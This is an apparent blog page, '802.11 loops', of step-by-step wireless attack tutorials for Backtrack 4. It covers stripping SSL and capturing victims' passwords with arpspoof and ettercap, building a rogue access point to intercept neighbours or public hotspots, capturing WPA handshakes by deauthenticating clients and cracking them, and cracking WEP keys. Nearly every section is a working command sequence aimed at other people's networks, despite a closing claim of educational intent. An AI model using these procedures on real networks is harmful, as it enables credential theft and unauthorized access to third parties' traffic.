Latest Entries »

Fun With SSL Strip

One thing  you may have been taught if you are tech savy is to always use ssl whenever you can. Well, you may be suprised to find out that it isn’t quite as secure as you may have hoped. One of the main benifits to using SSL Strip is that all ssl encrypted user/passwords will go through as clear text. To begin, we need a couple of things, at the very least, a copy of backtrack 4 beta and a copy of SSL Strip. For a more advanced attack, before you begin, follow the MITM attack.

Now that you have all of your tools collected and your attack vector established (either a mitm established or conencted to a network with victims)  you need to extract the contents of the tar  file which you saved to root by opening a shell and typing tar xvf sslstrip-0.7.tar.gz Then in shell, cd to the directory you created, which you can find by typing ls . Once there, type kwrite to open the text editor. Then we add the following text and save it as iptable.sh

echo “1″ > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

After you save the file, close kwrite, then type chmod 775 iptable.sh to make the file you made executable. The script you made allows your computer to forward specific traffic like a router.  Now type ./iptable.sh then ./sslstrip.py -k -w sslout.txt to set everything up for our attack, and put the output in the sslstrip folder in a file called sslout.txt . Now minimize the shell, letting it run in the background.

At this point, depending on how you started will decide how you choose the victim. If you did not follow the MITM attack and are just on a public network, you need to scan for your victims. To do so, open another shell and type ifconfig ath0 to see what your ip address(inet address) is for your network card ath0. if you use wlan0, replace ath0 with wlan0. Now, to scan for computers, type nmap -sP [ipaddress]/24 where [ipaddress] is the network you are on (if you are 192.168.1.x use 192.168.1.0) you can select any ip address on the list except for x.x.x.1 which is either your gateway or your router (or both).

If however you used the original MITM attack from the other page, log into the router web page, you should be at the sys-info page whcih is default. (if you are not, go to the status tab, select the sys-info sub tab) At the bottom of the page, you will see a list of all active  wirless clients with mac addresses and below that, a list of dhcp clients. All clients listed in the wireless clients tab are active and if you match those to the dhcp addresses issued, you have your list of possible victims.

Once you have your victim selected, type arpspoof -i ath0 -t 192.168.1.101 192.168.1.1 if the victim ip address is 192.168.1.101 and your network is 192.168.1.x  making sure to replace first three numbers if on a differenct network (i.e. 192.168.1.1=10.10.10.1 if your ath0 is 10.10.10.104). To insure that the arpspoof worked, the output should not have a 0:0:0:0:0:0, if your output begins with two mac addresses, congrats, you are now doing “Arp Poisoning”  You may now minimise the shell.

Last but not least, we can view the passwords as they come. To do so, open yet another shell, you should have 3 in total at this point, and type ettercap -Tq -i ath0 -L sslstrip which will find, capture, and display all passwords in cleartext that go across the network card ath0. Of course, if you use wlan0 instead of ath0 then replace as needed in the shell. If all is done correctly, you should see the user and pass of any site the victim goes to.

There are a number of tutorials out there for our attack, all of them set after you have done a man in the middle attack. But, they never tell you how to MITM. The reason they don’t is because there are numerous methods of attack, but, most methods require your own source of internet to complete the mitm and forward the traffic on to its proper destination.

Our method of attack uses a modified router and an Eee PC 900 running Backtrack 4 beta to mitm. To begin, we need to get our router. We use a Linksys WRT600N router, but it can just as easily be done with a Linksys WRT54G or any other router that supports the firmware we install, the dd-wrt v24 mega firmware.Once you install the new firmware from www.dd-wrt.org, the fun can begin.

Once the hardware is updated and ready to use, we then find the victim network to mitm. To find a vulnerable network, we start by putting our network card into monitor mode by opening a shell and typing airmon-ng start wifi0 if using an atheros card, if using an intel card, instead use the command iwconfig wlan0 mode monitor. If you are unsure what your wireless card is,open a shell and type iwconfig . Now that the card is in monitor mode, we start to scan by typing airodump-ng -i ath1 If you used wlan0 in the previous step, you will replace ath1 with wlan0.

Now that you have found your target network (which ever network is unencrypted) you are going to configure your router for the attack. We must put our NIC card into managed mode before we can configure the router, to do so, in shell type ifconfig ath1 down then ifconfig ath0 up or iwconfig wlan0 mode managed if you have an intel card, and finally we type NetworkManager start to allow us to connect to a wireless network in BT4 beta. Now with the default settings to the dd-wrt router, we log in and go to the setup tab, and change the ip address to something other than a default address (i.e. 192.169.3.1) and leave everything else alone. Then we move to the wireless tab. In basic wireless settings, we add 2 virtual interfaces, one being a private one for you alone, making sure to disable SSID broadcast and the other the same SSID of the victim network. Now save your settngs,  then set your physical interface mode to repeater, and set the SSID again to the victim SSID. Once you apply your settings again, connect to your hidden Access Point. Log back into your router, go back to the wireless settings and go to the wireless security. Be sure to add wpa encryption to your hidden network, apply settings and reconnect to your AP. Now, again, go back to wireless tab. Go to advanced settings and scroll down to TX power and change the value to 251, to boost the power that you are broadcasting at.

Now, sit back for a second, and breathe, all of the hard work is finally done. From any page on the Router’s web access, look at the top right corner, if you have a WAN IP, your job is done, you are connected to the victim network, are rebroadcasting the SSID from your router, and no matter how many users are connected through your router, the victim network only shows 1 “user”. It may seem like alot of work at first, from this point, all you need to do is change the basic wireless setting to any network to create a Rogue AP. This will work on your neighbors, any public hotspot, or any network you can connct to and if the network uses a splash screen to gain access, it will show up to any user connecting, which means that you are nearly invisible. This technique may also be used to extend the range of your own wireless network.

For this attack, we are going to need two things, Backtrack 4 Beta and a wpa encrypted network. Additional tools that are not required but could impove the attack are WPA rainbow tables for the top 1000 SSID’s which will be hosted here shortly.

To begin, we must throw our wireless card into monitor mode. To do so, we open a shell and either type airmon-ng start wifi0 for atheros cards or iwconfig wlan0 mode monitor  for intel cards. Then we need to determine what network we wish to attack by typing airodump-ng -i ath0 to find the network. Once found, we stop the scan by hitting Ctrl+C . Afterwards, we then type airodump-ng -c # -bssid XX:XX:XX:XX:XX:XX -i ath1 –showack -w capture where:

  • # = channel numbere
  • XX:XX:XX:XX:XX:XX = bssid or mac address of router

This command will create a capture file for the wpa handshake which what we crack to gain the wpa key. In order to gain the handshake we must deauthenticate a user connected to the network. To do so, we open another shell, type aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY ath1

where YY:YY:YY:YY:YY:YY is the mac address of a client connected to the target network, listed on the airodump shell. Let the aireplay shell run until you have a handshake captured in airodump. To check that you have a complete handshake, open a third shell, type aircrack-ng capture-01.cap to see if the target network as (1 handshake)


Now that you have a captured handshake, you have multiple options for cracking:

  • Aircrack-ng with a password file
  • CoWPAtty if you have a rainbow table
  • Online Cracking Site ($$)

For aircrack, load shell, type aircrack-ng capture-01.cap -w dictionary.txt

The two dictionary files used for the hases are:

To brute force the capture file using aircrack and john, type ./john –stdout –incremental:all | aircrack-ng -e ssid -w – capture_file

For cowpatty, load shell, type cd /pentest/wireless/cowpatty/ then ./cowpatty -r /root/capture-01.cap -s [ssid] -d [hashfile] where [ssid] is the network to crack and [hashfile] is the rainbow table for the network .

Just remember, if time is of the essence, then use cowpatty if possible.

*Update*

The WPA hashes have been uploaded, and can be found here

Before we begin, all tutorials are performed with an Eee-PC 900 with Backtrack 4 beta.

To start, we must put our network card into monitor mode. To determine what the name of your NIC card is, open a shell prompt  and type iwconfig

iwconfig

in the list, the main card is wifi0, and the ath0 means the card is an atheros card, but , if your list has wlan0, then you will be just fine. Our next step is to put the card into monitor mode. To do that, we then type
airmon-ng start wifi0

monitor mode

if your NIC card is wlan0, replace wifi0 with wlan0. As you see, there is a new card, labeled ath1. ath1 is our card in monitor mode. Now we must find a network in range to crack. So we run kismet. To launch kismet, we type kismet

kismet

If you have an error in which kismet cannot find ‘wlan0′ because you have an atheros card, you need to edit kismet.conf file which is normally located in the /etc/kismet/ folder. you will need to change the wlan0 to ath1 which is your NIC card in monitor mode.

After you find the wireless network you wish to crack in kismet, hit the ‘s’ key to sort the list of networks in kismet and select ‘w’ to sort by wep, scroll down to the network you want, hit enter to view the bssid of the network.

Now, open up a new shell prompt, we are going to start creating ivs with wesside-ng, we type              wesside-ng ath1 -v [bssid of network]

kismet

With wesside-ng,  we use the NIC ath1 and -v is the victim wireless bssid, you force association with the network, and guess the authentication key thats used, and start sending ivs to the network, and create a file ‘wep.cap’ in the directory you ran which has all the ivs generated. Once you have enough IVS you can crack the wep key. To see if you have enough ivs, load a third shell prompt, type aircrack-ng wep.cap to crack the network on the capture file if you have enough IVS

kismet

And thus, we have cracked our wireless network.

This is 802.11 loops, a site dedicated toward educating people about the dangers and vulnerabilites that exist in the world of wireless networks of all kinds, from 802.11abgn to bluetooth and even rfid.

Hopefully, with a collection of tools and knowledge every person who visits here will take away some knowledge to protect themselves and those around them from wireless attacks of all sorts, and even test out their own networks to find where they are insecure.

Follow

Get every new post delivered to your Inbox.